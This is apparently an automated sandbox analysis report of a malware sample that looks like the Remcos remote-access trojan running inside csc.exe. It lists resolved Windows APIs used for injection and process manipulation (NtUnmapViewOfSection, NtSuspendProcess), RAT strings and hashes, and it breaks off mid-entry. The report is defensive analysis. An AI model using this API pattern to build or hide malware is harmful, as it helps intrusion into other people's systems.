Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1000655C

Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7

Strings

., xrefs: 10006713
*?, xrefs: 10006433

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50

Uniqueness

Uniqueness Score: -1.00%

Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 10001719

Strings

Se., xrefs: 100016E5
: , xrefs: 100016B3

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: _strlen
String ID: : $Se.
API String ID: 4218353326-4089948878
Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765

Uniqueness

Uniqueness Score: -1.00%

Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 10002903

Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632

__CxxThrowException@8.LIBVCRUNTIME ref: 10002920

Strings

Unknown exception, xrefs: 1000292D

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

Uniqueness

Uniqueness Score: -1.00%

Function 10007103 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 10007103
GetCommandLineW.KERNEL32 ref: 1000710E

Strings

p4P, xrefs: 10007109

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: CommandLine
String ID: p4P
API String ID: 3253501508-2079396673
Opcode ID: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
Instruction ID: 64725d3052c2c9ae7bbd7e52e8b3a5750bb25634a918b02f39acb7dc5bcd530d
Opcode Fuzzy Hash: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
Instruction Fuzzy Hash: C0B00278C012209FE744AF7499DC2487FB0B758752B90D8AFD51AD2764D635C047EF20

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: csc.exePID: 6408, Parent PID: 2772COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	551
Total number of Limit Nodes:	14

Executed Functions

Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
GetProcAddress.KERNEL32(00000000), ref: 0041CB88
LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
GetProcAddress.KERNEL32(00000000), ref: 0041CC11
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
GetProcAddress.KERNEL32(00000000), ref: 0041CC25
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
GetProcAddress.KERNEL32(00000000), ref: 0041CC39
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
GetProcAddress.KERNEL32(00000000), ref: 0041CC61
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
GetProcAddress.KERNEL32(00000000), ref: 0041CC75
LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
GetProcAddress.KERNEL32(00000000), ref: 0041CC86
LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
GetProcAddress.KERNEL32(00000000), ref: 0041CD07
LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
GetProcAddress.KERNEL32(00000000), ref: 0041CD4C

Strings

shcore, xrefs: 0041CB95
NtQueryInformationProcess, xrefs: 0041CCE1
Psapi, xrefs: 0041CB60
NtSuspendProcess, xrefs: 0041CC9C
Rstrtmgr, xrefs: 0041CD0E, 0041CD18, 0041CD23, 0041CD33, 0041CD43
Kernel32, xrefs: 0041CB80
Iphlpapi, xrefs: 0041CCC1, 0041CCCB, 0041CCD6
GetComputerNameExW, xrefs: 0041CBEB
NtResumeProcess, xrefs: 0041CCAC
GetExtendedUdpTable, xrefs: 0041CCD1
GetFinalPathNameByHandleW, xrefs: 0041CCF5
GetExtendedTcpTable, xrefs: 0041CCBC
Shlwapi, xrefs: 0041CC79
GetConsoleWindow, xrefs: 0041CC88
GetProcessImageFileNameW, xrefs: 0041CB5A, 0041CB5F, 0041CB7F
IsUserAnAdmin, xrefs: 0041CBFF
RmGetList, xrefs: 0041CD2E
EnumDisplayDevicesW, xrefs: 0041CC27
GlobalMemoryStatusEx, xrefs: 0041CBC8
ntdll, xrefs: 0041CBBD, 0041CBC2, 0041CCA1, 0041CCB1, 0041CCE6
GetMonitorInfoW, xrefs: 0041CC4F
RmEndSession, xrefs: 0041CD3E
RmRegisterResources, xrefs: 0041CD1E
SetProcessDpiAwareness, xrefs: 0041CB8F, 0041CB94, 0041CBA8
user32, xrefs: 0041CBA9, 0041CC2C, 0041CC40, 0041CC54
kernel32, xrefs: 0041CBCD, 0041CBDC, 0041CBF0, 0041CC18, 0041CC68, 0041CC8D, 0041CCFA
EnumDisplayMonitors, xrefs: 0041CC3B
NtUnmapViewOfSection, xrefs: 0041CBB8
SetProcessDEPPolicy, xrefs: 0041CC13
Shell32, xrefs: 0041CC04
GetSystemTimes, xrefs: 0041CC63
RmStartSession, xrefs: 0041CD09
IsWow64Process, xrefs: 0041CBD7

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 4236061018-3687161714
Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

Uniqueness

Uniqueness Score: -1.00%

Function 004432B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
TerminateProcess.KERNEL32(00000000), ref: 004432DD
ExitProcess.KERNEL32 ref: 004432EF

Strings

PkGNG, xrefs: 004432B7

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID: PkGNG
API String ID: 1703294689-263838557
Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9C5 Relevance: 84.8, APIs: 14, Strings: 34, Instructions: 795
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83

GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe,00000104), ref: 0040E9EE

Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C

Strings

del, xrefs: 0040F2ED, 0040F36F
PG, xrefs: 0040EA96
PG, xrefs: 0040ED7B
PG, xrefs: 0040EEAC
PG, xrefs: 0040EDD3
exepath, xrefs: 0040EE92, 0040EF40
PG, xrefs: 0040F1C7
license_code.txt, xrefs: 0040EA4D
PG, xrefs: 0040F187
8SG, xrefs: 0040EE65
PG, xrefs: 0040F0D8
SG, xrefs: 0040EB05
PG, xrefs: 0040EF66
PG, xrefs: 0040F036
PG, xrefs: 0040F12B
PG, xrefs: 0040F1F3
PG, xrefs: 0040F103
licence, xrefs: 0040EF88
PG, xrefs: 0040EA5D
SG, xrefs: 0040EB62
PG, xrefs: 0040F154
Exe, xrefs: 0040EB0F
User, xrefs: 0040F28E
dMG, xrefs: 0040F1A8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 0040E9E6, 0040EE0F
PSG, xrefs: 0040F224
Administrator, xrefs: 0040F287
Remcos Agent initialized, xrefs: 0040EFEF
Software\, xrefs: 0040EAC3
Inj, xrefs: 0040EBD5, 0040EBEC
PG, xrefs: 0040ED47
Access Level: , xrefs: 0040F29F
del, xrefs: 0040F2D1
8SG, xrefs: 0040EF1D

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
API String ID: 2830904901-3478993377
Opcode ID: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
Opcode Fuzzy Hash: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

Uniqueness

Uniqueness Score: -1.00%

Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
SetEvent.KERNEL32(?), ref: 00404E43
FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
closesocket.WS2_32(?), ref: 00404E5A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
SetEvent.KERNEL32(?), ref: 00404EA2
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
SetEvent.KERNEL32(?), ref: 00404EBA
CloseHandle.KERNEL32(?), ref: 00404EBF
CloseHandle.KERNEL32(?), ref: 00404EC4
SetEvent.KERNEL32(?), ref: 00404ED1
CloseHandle.KERNEL32(?), ref: 00404ED6

Strings

PkGNG, xrefs: 00404E28

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
String ID: PkGNG
API String ID: 2403171778-263838557
Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
_free.LIBCMT ref: 004482D3
_free.LIBCMT ref: 004482FA
SetLastError.KERNEL32(00000000), ref: 00448307
SetLastError.KERNEL32(00000000), ref: 00448310

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D

Uniqueness

Uniqueness Score: -1.00%

Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
GetLastError.KERNEL32 ref: 0040D083

Strings

SG, xrefs: 0040D069

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: SG
API String ID: 1925916568-3189917014
Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

Uniqueness

Uniqueness Score: -1.00%

Function 00449BF0 Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

